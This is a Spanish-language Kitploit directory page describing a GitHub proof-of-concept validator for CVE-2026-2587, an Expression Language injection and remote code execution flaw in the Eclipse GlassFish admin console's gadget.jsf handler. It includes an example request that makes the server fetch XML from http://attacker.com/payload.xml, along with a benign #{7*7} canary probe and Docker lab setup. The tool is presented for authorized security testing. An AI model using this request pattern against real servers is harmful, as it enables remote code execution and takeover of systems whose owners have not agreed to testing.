Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-2587-Exploit-POC — Validador de PoC para CVE-2026-2587 de inyección EL (Expression Language) y ejecución remota de código (RCE) en Eclipse GlassFish en el manejador gadget.jsf de la consola de administración. Escáner de vulnerabilidades autenticado y seguro para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/bhanunamikaze/cve-2026-2587-exploit-poc
Escáneres de VulnerabilidadesAnálisis Dinámico (Sandboxing)Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
Labs y Práctica
GitHubbhanunamikaze/cve-2026-2587-exploit-poc

CVE-2026-2587-Exploit-POC

Validador de PoC para CVE-2026-2587 de inyección EL (Expression Language) y ejecución remota de código (RCE) en Eclipse GlassFish en el manejador gadget.jsf de la consola de administración. Escáner de vulnerabilidades autenticado y seguro para pruebas autorizadas.

Ver RepositorioSitio web
110hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-2587 Exploit PoC — Validador de inyección EL/RCE en Eclipse GlassFish

Validador PoC seguro para CVE-2026-2587, un problema crítico de inyección EL/RCE que afecta el manejo de gadgets de la consola de administración de Eclipse GlassFish a través de /common/gadgets/gadget.jsf.

Esta herramienta ayuda a los equipos de seguridad a validar la exposición a CVE-2026-2587 en entornos autorizados utilizando un canario EL aritmético benigno.

Asignado por: Eclipse Foundation (CNA) · Publicado: 19 de mayo de 2026 CVSS: 9.6 Crítico · AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H CWE: CWE-917 — Inyección de Expression Language Versiones afectadas: Desconocido en el aviso público al 21 de mayo de 2026 Versiones parcheadas: Desconocido en el aviso público al 21 de mayo de 2026 Regla del escáner: la versión es solo contexto de enrutamiento/informe; el veredicto requiere prueba.


Tabla de contenidos

  • Resumen de la vulnerabilidad
  • Cómo funciona
  • Requisitos de autenticación
  • Configuración
  • Entorno de laboratorio (Docker)
  • Generación de un XML de sonda
  • Uso — Objetivo único
    • Localhost / Docker
    • Credenciales
    • Inicio de sesión por fuerza bruta
    • Remoto a través de túnel Cloudflare
    • XML estático pre-alojado
    • Remoto a través de ngrok (último recurso)
    • Solo verificación no autenticada
  • Uso — Múltiples objetivos
    • Formato del archivo de objetivos
    • Escaneo en paralelo
  • Formatos de salida
    • Consola
    • CSV
    • JSON
    • Combinación de salidas
  • Opciones avanzadas
    • Descubrimiento de endpoint y versión
    • Valores de canario personalizados
    • Cabeceras personalizadas
  • Casos de prueba
  • Interpretación de la salida
  • Verificación manual
  • Remediación
  • Referencias
  • Descargo de responsabilidad

Resumen de la vulnerabilidad

Existe una vulnerabilidad crítica de ejecución remota de código en el manejador de gadgets de la consola de administración de GlassFish. La aplicación procesa archivos .xml obtenidos de una URL suministrada a través del parámetro de consulta gadget= y evalúa los valores proporcionados por el usuario dentro de los atributos <ModulePrefs> mediante el motor de Java Expression Language (EL) sin saneamiento ni escape.``` GET /common/gadgets/gadget.jsf?gadget=http://attacker.com/payload.xml

Si el XML contiene `#{7*7}` en un atributo `<ModulePrefs title="">`, GlassFish lo evalúa en el lado del servidor y devuelve `49` — confirmando la ejecución de EL. Una cadena completa de RCE sigue a través del acceso de EL al runtime de Java.

Los registros públicos de avisos actuales no publican un límite de versión afectada o parcheada. Por lo tanto, este validador se basa primero en la evidencia: identifica GlassFish e informa metadatos de versión, pero no clasifica un objetivo como vulnerable solo a partir de una cadena de versión.

---

## Cómo Funciona

![Flujo de trabajo de validación segura para CVE-2026-2587](https://assets.kitploit.com/production/public/readmes/15612/d24fad85e9cfd24152f916ba71622ed442636e171c4e912ad5ffd7d973f9a6ba.png)

La ruta de validación segura aloja una sonda XML benigna, envía una solicitud autenticada de la consola de administración a `gadget.jsf`, permite que GlassFish obtenga ese XML desde la URL de callback, y verifica si el canary `<ModulePrefs title="">` evalúa de `#{7*7}` a `49`.

**Punto de inyección confirmado vs. no:**```xml
<!-- ✅ EL IS evaluated -->
<ModulePrefs title="#{7*7}" />              <!-- returns 49 -->
<ModulePrefs description="#{7*7}" />        <!-- returns 49 -->

<!-- ❌ EL NOT evaluated -->
<Content type="html">
  <![CDATA[ #{7*7} ]]>                      <!-- returns #{7*7} literally -->
</Content>

Requisitos de autenticación

Escenario¿Autenticación necesaria?
Golpe directo a gadget.jsfSí — autenticación FORM, página de inicio de sesión 200
Ataque CSRF realNo — aprovecha la sesión activa del administrador
Este validadorSí — --cookie o --username/--password
Verificación de exposición no autenticadaNo — el script lo prueba automáticamente

El vector CVSS PR:N / UI:R significa:

  • PR:N — el atacante no necesita credenciales propias
  • UI:R — un administrador autenticado debe interactuar (entrega CSRF)

Para la validación en laboratorio, omita CSRF por completo — use su propia sesión de administrador directamente.


Configuración

Requisitos: Python 3.9+ · `requests````bash git clone https://github.com/Bhanunamikaze/CVE-2026-2587-Exploit-POC cd CVE-2026-2587-Exploit-POC pip install requests

optional for coloured terminal output:

pip install colorama

**Contenido del repositorio:**```
CVE-2026-2587-Exploit-POC/
├── assets/
│   └── cve-2026-2587-validation-flow.png  ← README workflow diagram
├── CVE-2026-2587-Exploit-POC.py   ← main script
├── probe.xml                   ← ready-to-host static probe XML
├── targets.txt.example         ← multi-target file template
└── README.md

Entorno de laboratorio (Docker)

Advertencia: GHSA aún lista las versiones afectadas y parcheadas como desconocidas. omnifish/glassfish:7.0.15 es un buen candidato de laboratorio — no una compilación garantizada como vulnerable. La primitiva de validación sigue siendo el canario aritmético: si #{7*7} se evalúa como 49, EL está activo.

Opción A — docker compose (recomendado)```bash

from the repo root

docker compose -f docker-compose.lab.yml up

Levanta GlassFish 7.0.15 con puertos enlazados solo a `127.0.0.1` y `host.docker.internal` preconfigurado para que el contenedor pueda alcanzar tu servidor XML local.

### Opción B — ejecución simple de docker run```bash
docker run --rm \
  --name gf-cve-2026-2587-lab \
  -p 127.0.0.1:8080:8080 \
  -p 127.0.0.1:4848:4848 \
  --add-host=host.docker.internal:host-gateway \
  omnifish/glassfish:7.0.15

Admin console: https://localhost:4848 · Login: admin / admin (Certificado autofirmado — se espera una advertencia del navegador.)


Servir el XML de sonda benigna

En una segunda terminal:```bash

The repo ships with probe.xml — serve it directly:

python3 -m http.server 8000 --bind 0.0.0.0

Verificar la accesibilidad desde la perspectiva del contenedor:```bash
docker exec gf-cve-2026-2587-lab \
  curl -s http://host.docker.internal:8000/probe.xml | head -5

Disparo manual

Descargar herramienta